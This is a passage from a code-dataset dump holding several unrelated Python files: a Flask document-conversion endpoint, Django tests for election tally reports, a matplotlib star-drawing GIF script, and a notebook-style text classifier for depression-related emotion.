LIBREOFFICE_EXPORT_TYPES:\n        return (\"%s format is not supported\" % (output_format), 400)\n    try:\n        for upload in request.files.values():\n            file_name = FileName(upload.filename)\n            mime_type = normalize_mimetype(upload.mimetype)\n            if not file_name.has_extension:\n                file_name.extension = extensions.get(mime_type)\n            if not file_name.has_extension:\n                file_name.extension = mimetype_extension(mime_type)\n            fd, upload_file = mkstemp(suffix=file_name.safe())\n            os.close(fd)\n            log.info('Convert to %s: %s [%s]',\n                     output_format, upload_file, mime_type)\n            upload.save(upload_file)\n            converter.convert_file(upload_file, output_format, timeout)\n            output_filename = \"%s.%s\" % (converter.OUT, output_format)\n            log.info(\"Send file %s [Mime-type: %s]\" %\n                     (output_filename, OUTPUT_MIME_TYPES[output_format]))\n            return send_file(output_filename,\n                             mimetype=OUTPUT_MIME_TYPES[output_format],\n                             attachment_filename=output_filename)\n        return ('No file uploaded', 400)\n    except HTTPException:\n        raise\n    except ConversionFailure as ex:\n        app.is_dead = True\n        return (str(ex), 400)\n    except Exception as ex:\n        app.is_dead = True\n        log.error('Error: %s', ex)\n        return ('FAIL', 503)\n    finally:\n        if upload_file is not None and os.path.exists(upload_file):\n            os.unlink(upload_file)\n        if os.path.exists(converter.OUT):\n            os.unlink(converter.OUT)\n        lock.release()\n", "sub_path": "convert/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.basicConfig", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "threading.RLock", "line_number": 17, "usage_type": "call"}, {"api_name": "convert.formats.load_mime_extensions", "line_number": 18, "usage_type": "call"}, {"api_name": "convert.converter.Converter", "line_number": 19, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wsgi.ClosingIterator", "line_number": 33, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 56, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 58, 
"usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.files.values", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 62, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 62, "usage_type": "name"}, {"api_name": "pantomime.FileName", "line_number": 63, "usage_type": "call"}, {"api_name": "pantomime.normalize_mimetype", "line_number": 64, "usage_type": "call"}, {"api_name": "pantomime.mimetype_extension", "line_number": 68, "usage_type": "call"}, {"api_name": "tempfile.mkstemp", "line_number": 69, "usage_type": "call"}, {"api_name": "os.close", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.send_file", "line_number": 78, "usage_type": "call"}, {"api_name": "werkzeug.exceptions.HTTPException", "line_number": 82, "usage_type": "name"}, {"api_name": "convert.converter.ConversionFailure", "line_number": 84, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path", "line_number": 94, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "107541633", "text": "import json\n\nfrom django.test import RequestFactory\n\nfrom tally_ho.libs.permissions import groups\nfrom tally_ho.apps.tally.models.center import Center\nfrom tally_ho.apps.tally.models.candidate import Candidate\nfrom tally_ho.libs.models.enums.form_state import FormState\nfrom tally_ho.libs.models.enums.entry_version import EntryVersion\nfrom tally_ho.libs.models.enums.center_type import CenterType\nfrom tally_ho.apps.tally.views.reports import (\n administrative_areas_reports as admin_reports,\n)\nfrom tally_ho.libs.tests.test_base import (\n create_electrol_race, create_result_form, create_station,\\\n create_reconciliation_form, create_sub_constituency, create_tally,\\\n create_region, create_constituency, create_office, create_result,\\\n create_candidates, TestBase, create_ballot\n)\nfrom tally_ho.libs.tests.fixtures.electrol_race_data import (\n electrol_races\n)\n\n\n\nclass TestAdministrativeAreasReports(TestBase):\n def setUp(self):\n self.factory = RequestFactory()\n self._create_permission_groups()\n self._create_and_login_user()\n self._add_user_to_group(self.user, groups.TALLY_MANAGER)\n self.tally = create_tally()\n self.tally.users.add(self.user)\n self.electrol_race = create_electrol_race(\n self.tally,\n **electrol_races[0]\n )\n ballot = create_ballot(self.tally, electrol_race=self.electrol_race)\n self.region = create_region(tally=self.tally)\n office = create_office(tally=self.tally, region=self.region)\n self.constituency = create_constituency(tally=self.tally)\n self.sc =\\\n create_sub_constituency(code=1, field_office='1', ballots=[ballot])\n center, _ = Center.objects.get_or_create(\n code='1',\n mahalla='1',\n name='1',\n office=office,\n region='1',\n village='1',\n active=True,\n tally=self.tally,\n sub_constituency=self.sc,\n center_type=CenterType.GENERAL,\n constituency=self.constituency\n )\n self.station = create_station(\n center=center, registrants=20, tally=self.tally\n )\n self.result_form = create_result_form(\n tally=self.tally,\n 
form_state=FormState.ARCHIVED,\n office=office,\n center=center,\n station_number=self.station.station_number,\n ballot=ballot)\n self.recon_form = create_reconciliation_form(\n result_form=self.result_form,\n user=self.user,\n number_ballots_inside_box=20,\n number_cancelled_ballots=0,\n number_spoiled_ballots=0,\n number_unstamped_ballots=0,\n number_unused_ballots=0,\n number_valid_votes=20,\n number_invalid_votes=0,\n number_ballots_received=20,\n )\n votes = 20\n create_candidates(\n self.result_form, votes=votes, user=self.user,\n num_results=1, tally=self.tally\n )\n for result in self.result_form.results.all():\n result.entry_version = EntryVersion.FINAL\n result.save()\n # create duplicate final results\n create_result(self.result_form, result.candidate, self.user, votes)\n\n def test_sub_constituency_turn_out_and_votes_summary_reports(self):\n \"\"\"\n Test that the sub constituency turn out and votes summary reports are\n rendered as expected.\n \"\"\"\n # add\n view = admin_reports.SummaryReportDataView.as_view()\n request = self.factory.post('/sub-constituency-summary-report')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk\n )\n\n # Sub Constituency votes summary report tests\n code, valid_votes, invalid_votes, cancelled_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{}'.format(self.sc.code))\n self.assertEquals(\n valid_votes,\n '{}'.format(\n self.recon_form.number_valid_votes))\n self.assertEquals(\n invalid_votes,\n '{}'.format(\n self.recon_form.number_invalid_votes))\n self.assertEquals(\n cancelled_votes,\n '{}'.format(\n self.recon_form.number_cancelled_ballots))\n\n view = admin_reports.ProgressiveReportDataView.as_view()\n request = self.factory.get('/sub-cons-progressive-report-list')\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n region_id=self.region.pk,\n constituency_id=self.constituency.pk)\n candidates_count = Candidate.objects.filter(\n tally__id=self.tally.pk).count()\n\n # Sub Constituency progressive report tests\n code, num_candidates, num_votes, _, _, _ =\\\n json.loads(\n response.content.decode())['data'][0]\n\n self.assertEquals(\n code, '{}'.format(self.sc.code))\n self.assertEquals(\n num_votes,\n '{}'.format(\n self.result_form.num_votes))\n self.assertEquals(\n num_candidates,\n '{}'.format(\n candidates_count))\n\n def apply_filter(self, data):\n view = admin_reports.ResultFormResultsListDataView.as_view()\n request = self.factory.post('/form-results', data=data)\n request.user = self.user\n response = view(\n request,\n tally_id=self.tally.pk,\n )\n return response\n\n def test_result_form_result_list_data_view_filters(self):\n \"\"\"\n Test ResultFormResultsListDataView filters\n \"\"\"\n # test race type filter\n data = {\n \"data\": str(\n {\n \"election_level_names\":\n [\"Presidential\"],\n \"sub_race_type_names\":\n [\"ballot_number_presidential_runoff\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n data = {\n \"data\": str(\n {\n \"election_level_names\": [\"Presidential\"],\n \"sub_race_type_names\": [\"ballot_number_presidential\"]\n }\n )\n }\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test center filter\n data = {'data': '{\"select_1_ids\": [\"-1\"]}'} # non existent id\n response 
= self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n center_id = self.station.center.id\n data = {'data': '{\"select_1_ids\": ' + f'[\"{center_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test stations filter\n data = {'data': '{\"select_2_ids\": [\"-1\"]}'} # non existent id\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n station_id = self.station.id\n data = {'data': '{\"select_2_ids\": ' + f'[\"{station_id}\"]' + '}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n\n # test ballot status filter\n data = {'data': '{\"ballot_status\": [\"not_available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"ballot_status\": [\"available_for_release\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station filter\n data = {'data': '{\"station_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"station_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test candidate status\n data = {'data': '{\"candidate_status\": [\"active\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n data = {'data': '{\"candidate_status\": [\"inactive\"]}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 0)\n\n # test station percentage processed\n data = {'data': '{\"percentage_processed\": \"10\"}'}\n response = self.apply_filter(data)\n self.assertEquals(\n len(json.loads(response.content.decode())['data']), 2)\n", "sub_path": "tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py", "file_name": "test_administrative_areas_reports.py", "file_ext": "py", "file_size_in_byte": 9528, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tally_ho.libs.tests.test_base.TestBase", "line_number": 26, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 28, "usage_type": "call"}, {"api_name": "tally_ho.libs.permissions.groups.TALLY_MANAGER", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.permissions.groups", "line_number": 31, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_tally", "line_number": 32, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_electrol_race", "line_number": 34, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.fixtures.electrol_race_data.electrol_races", "line_number": 36, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_ballot", "line_number": 38, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_region", "line_number": 39, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_office", "line_number": 40, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_constituency", "line_number": 41, "usage_type": "call"}, 
{"api_name": "tally_ho.libs.tests.test_base.create_sub_constituency", "line_number": 43, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects.get_or_create", "line_number": 44, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.center.Center.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.center.Center", "line_number": 44, "usage_type": "name"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType.GENERAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.center_type.CenterType", "line_number": 54, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_station", "line_number": 57, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_result_form", "line_number": 60, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState.ARCHIVED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.form_state.FormState", "line_number": 62, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_reconciliation_form", "line_number": 67, "usage_type": "call"}, {"api_name": "tally_ho.libs.tests.test_base.create_candidates", "line_number": 80, "usage_type": "call"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion.FINAL", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tally_ho.libs.models.enums.entry_version.EntryVersion", "line_number": 85, "usage_type": "name"}, {"api_name": "tally_ho.libs.tests.test_base.create_result", "line_number": 88, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView.as_view", "line_number": 96, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.SummaryReportDataView", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 96, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 108, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView.as_view", "line_number": 126, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ProgressiveReportDataView", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 126, "usage_type": "name"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects.filter", "line_number": 134, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate.objects", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.models.candidate.Candidate", "line_number": 134, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 139, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView.as_view", "line_number": 154, "usage_type": "call"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports.ResultFormResultsListDataView", "line_number": 154, "usage_type": "attribute"}, {"api_name": "tally_ho.apps.tally.views.reports.administrative_areas_reports", "line_number": 154, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 180, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 
191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 197, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 202, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 219, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 223, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 229, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 233, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 239, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 249, "usage_type": "call"}]} +{"seq_id": "261314306", "text": "\"\"\"\nDylan Copley\nMAE 5020\nHomework 1\nProblem 2\n\nSame polygon gen thing except it makes stars... Was showing off to a friend.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio\nimport os\n\n\n#function that plots the polygon, then returns the decoded rgb and image property info\ndef polygon_anim(s):\n # defining angles\n angles = [(360 / (2 * s)) * n for n in range(0, 2 * s)]\n\n # defining points from angles, list comprehension except each value is a list itself. index 0 and 1 are x and y.\n points = [[np.cos(n * (np.pi / 180)), np.sin(n * (np.pi / 180))] for n in angles]\n\n # simply appending the last point as the initial point. This way when lines are needed to be drawn the last points\n # and the initial point will have its line drawn.\n points.append(points[0])\n\n #generated twice the number of angles/vertices. Every other vertice has half the radial length, creating star shape\n for n in range(0, len(points) - 1):\n #modulus operator to test if divisible by 2, same as saying \"every other\", or \"every even\"\n if n % 2 == 1:\n points[n][0] = points[n][0] / 2\n points[n][1] = points[n][1] / 2\n\n #defining a subplot to play around with draw modes\n fig, ax = plt.subplots()\n\n #for each point,\n for n in range(0,len(points)-1):\n #bit tricky to read,\n #plt.plot([x1,x2],[y1,y2],'red line solid dot points')\n #points[n][0] are x value, points[n][1] are y value.\n #have to do a ax subplot plot to send current frame\n ax.plot([points[n][0],points[n+1][0]],[points[n][1],points[n+1][1]],'ro-')\n\n\n #pretifying\n ax.set_title(\"Number of sides: \" + str(s))\n ax.grid(True)\n ax.set_xlim([-2,2])\n #took an image of plot window, discovered that the scaling ratio of x to y was about 1.343\n #this makes the x and y scales the same, and a prettier image.\n ax.set_ylim([-2/1.343,2/1.343])\n #showing origin\n ax.plot([0],[0],'bo')\n\n #maximize and grab current frame. I have no clue how I got this code, I borrowed it from an old program.\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n\n #return frame generated\n return image\n\n#getting root directory, need to save the gif file somewhere\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n\n#very scary function\n#imageio.mimsave((PATH),[list comprehension with each value being a current frame image],fps=n)\n#create a gif file stored in the root directory of the program.\n#list comprehension generating 27 polygons from 3 to 14. defined fps as 4.\n#image is saved as animated_polygon.gif. 
file will overwrite if program ran again\n\nimageio.mimsave((ROOT_DIR + \"\\\\animated_star.gif\"),[polygon_anim(s) for s in range(4,12)], fps=4)", "sub_path": "test_files/star_generator.py", "file_name": "star_generator.py", "file_ext": "py", "file_size_in_byte": 2836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.sin", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.frombuffer", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 66, "usage_type": "call"}, {"api_name": "imageio.mimsave", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "273872550", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport re\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\nfh=open('isear.txt')\nlabel=[]\nsen=[]\nfor line in fh:\n lis=re.findall('[a-zA-Z]+',line)\n label.append(lis[0])\n sen.append(' '.join(lis[1:]))\n \n\n\n# In[3]:\n\n\nprint(label)\n\n\n# In[4]:\n\n\nprint(sen)\n\n\n# In[5]:\n\n\nimport csv\n\n\n# In[6]:\n\n\nwith open ('data2.csv','w') as f:\n writer=csv.writer(f)\n writer.writerows(zip(label,sen))\n\n\n# In[7]:\n\n\ndf=pd.read_csv('data2.csv')\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf.rename(columns={'ID':'label','CITY COUN SUBJ SEX AGE RELI PRAC FOCC MOCC FIEL EMOT WHEN LONG INTS ERGO TROPHO TEMPER EXPRES MOVE EXP EXP EXP PARAL CON EXPC PLEA PLAN FAIR CAUS COPING MORL SELF RELA VERBAL NEUTRO Field Field Field MYKEY SIT STATE':'sentence'},inplace=True)\n\n\n# In[ ]:\n\n\n\n\n\n# In[10]:\n\n\ndf.head()\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[ ]:\n\n\n\n\n\n# In[12]:\n\n\n'''\nNot using NLTK as Spacy is more faster and accurate in Lemmatization and removing stop words.\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n setence=sentence.split()\n ws=WordLemmatizer()\n sentence=[ws.lemmatize(s) for s in sentence if not s in stopwords.words('english')]\n sentence=' '.join(sentence)\n corpus.append(sentence)'''\n\n\n# In[13]:\n\n\n\nimport spacy\nnlp=spacy.load('en_core_web_sm')\n\n\n# In[14]:\n\n\nprint(nlp.Defaults.stop_words)\n\n\n# In[ ]:\n\n\n\n\n\n# In[15]:\n\n\n# Removing stop words\ncorpus=[]\nfor i in range(7666):\n sentence=re.sub('[^a-zA-Z]', ' ',df['sentence'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[16]:\n\n\ncorpus\n\n\n# In[17]:\n\n\n#Lemmatization\ncorpus2=[]\nfor i in range(7666):\n sent=nlp(corpus[i])\n \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[18]:\n\n\ncorpus2\n\n\n# In[19]:\n\n\ndf.head()\n\n\n# In[20]:\n\n\ndf['cleaned_sentence']=corpus2\n\n\n# In[21]:\n\n\ndf.head()\n\n\n# In[22]:\n\n\ndf.label.value_counts()\n\n\n# In[23]:\n\n\n#WordCloud Analysis\n\n\n# In[24]:\n\n\nget_ipython().system('pip install wordcloud')\nfrom wordcloud import WordCloud\nimport matplotlib.cm\nimport 
matplotlib.pyplot as plt\n\n\n# In[25]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'sadness']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[26]:\n\n\ndepressive_words = ' '.join(list(df[df['label'] == 'joy']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=matplotlib.cm.inferno).generate(depressive_words)\nplt.figure(figsize = (8, 6), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n\n# In[27]:\n\n\ndf['emotion'] = df['label'].apply(lambda c: 'Positive' if c =='sadness' else 'Negative')\n\n\n# In[28]:\n\n\ndf['emotion'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[29]:\n\n\ndf5=pd.read_csv('sentiment_tweets3.csv')\n\n\n# In[30]:\n\n\ndf5.head()\n\n\n# In[31]:\n\n\ndf5 = df5.drop(['Unnamed: 0'],axis=1)\n\n\n# In[32]:\n\n\ndf5.label.value_counts()\n\n\n# In[33]:\n\n\ndf5\n\n\n# In[34]:\n\n\ndf5=df5.iloc[6000:]\n\n\n# In[35]:\n\n\ndf5.info()\n\n\n# In[36]:\n\n\ncorpus=[]\nfor i in range(6000,10314):\n sentence=re.sub('[^a-zA-Z]', ' ',df5['message'][i])\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n corpus.append(sentence)\n\n\n# In[37]:\n\n\ncorpus2=[]\nfor i in corpus:\n sent=nlp(i) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n corpus2.append(sentence2)\n\n\n# In[38]:\n\n\nlen(corpus2)\n\n\n# In[39]:\n\n\ndf5['cleaned_sentence']=corpus2\n\n\n# In[40]:\n\n\ndf5=df5[['label','message','cleaned_sentence']]\n\n\n# In[41]:\n\n\ndf5.head()\n\n\n# In[42]:\n\n\ndf.head()\n\n\n# In[43]:\n\n\ndf5.rename(columns={'message':'sentence'},inplace=True)\n\n\n# In[44]:\n\n\ndf3=df5[df5['label']>=0]\n\n\n# In[45]:\n\n\ndf3.info()\n\n\n# In[46]:\n\n\ndf.info()\n\n\n# In[47]:\n\n\ndf4=df.append(df3)\n\n\n# In[48]:\n\n\ndf4.head()\n\n\n# In[49]:\n\n\ndf4['emotion'] = df4['label'].apply(lambda c: 'Positive' if c !=0 and c!='joy' else 'Negative')\n\n\n# In[50]:\n\n\ndf4.info()\n\n\n# In[51]:\n\n\ndf4['emotion'].value_counts()\n\n\n# In[52]:\n\n\ndf4.info()\n\n\n# In[53]:\n\n\ndf4.to_csv('cleaned_data.csv')\n\n\n# In[54]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n\nX = df4['cleaned_sentence']\ny = df4['emotion']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2,random_state=42)\n\n\n# In[55]:\n\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.svm import LinearSVC\n\ntext_clf = Pipeline([('tfidf', TfidfVectorizer()),\n ('clf', LinearSVC()),\n])\n\n# Feed the training data through the pipeline\ntext_clf.fit(X_train, y_train) \n\n\n# In[56]:\n\n\ndef process(str):\n corpus=[]\n \n sentence=re.sub('[^a-zA-Z]', ' ',str)\n sentence=sentence.lower()\n sentence=sentence.split()\n \n sentence=[s for s in sentence if not nlp.vocab[s].is_stop]\n sentence=' '.join(sentence)\n \n \n \n sent=nlp(sentence) \n sent2=[s.lemma_ for s in sent ]\n sentence2=' '.join(sent2)\n return(sentence2)\n\n\n# In[57]:\n\n\nstring=str(input(\"Enter Message :\"))\nstring2=process(string) \nz=pd.Series(string2)\npredictions = text_clf.predict(z)\npredictions\n\n\n# 
In[58]:\n\n\npredictions2=text_clf.predict(X_test)\nfrom sklearn import metrics\nprint(metrics.confusion_matrix(y_test,predictions2))\n\n\n# In[59]:\n\n\nprint(metrics.classification_report(y_test,predictions2))\n\n\n# \n\n# In[60]:\n\n\nprint(metrics.accuracy_score(y_test,predictions2))\n\n\n# In[62]:\n\n\ndepressive_words = ' '.join(list(df4[df4['emotion'] == 'Negative']['cleaned_sentence']))\ndepressive_wc = WordCloud(width = 512,height = 512, collocations=False, colormap=\"Set1\").generate(depressive_words)\nplt.figure(figsize = (10,8), facecolor = 'k')\nplt.imshow(depressive_wc)\nplt.axis('off')\nplt.tight_layout(pad = 0)\nplt.show()\n\n", "sub_path": "DepressionAnalysis.py", "file_name": "DepressionAnalysis.py", "file_ext": "py", "file_size_in_byte": 6208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.findall", "line_number": 19, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 54, "usage_type": "call"}, {"api_name": "spacy.load", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 135, "usage_type": "call"}, {"api_name": "wordcloud.WordCloud", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 212, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 216, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 216, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 217, "usage_type": "name"}, {"api_name": "wordcloud.WordCloud", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.cm.cm", "line_number": 224, "usage_type": "attribute"}, {"api_name": "matplotlib.cm", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 226, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 226, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 265, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 309, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 435, "usage_type": "call"}, 
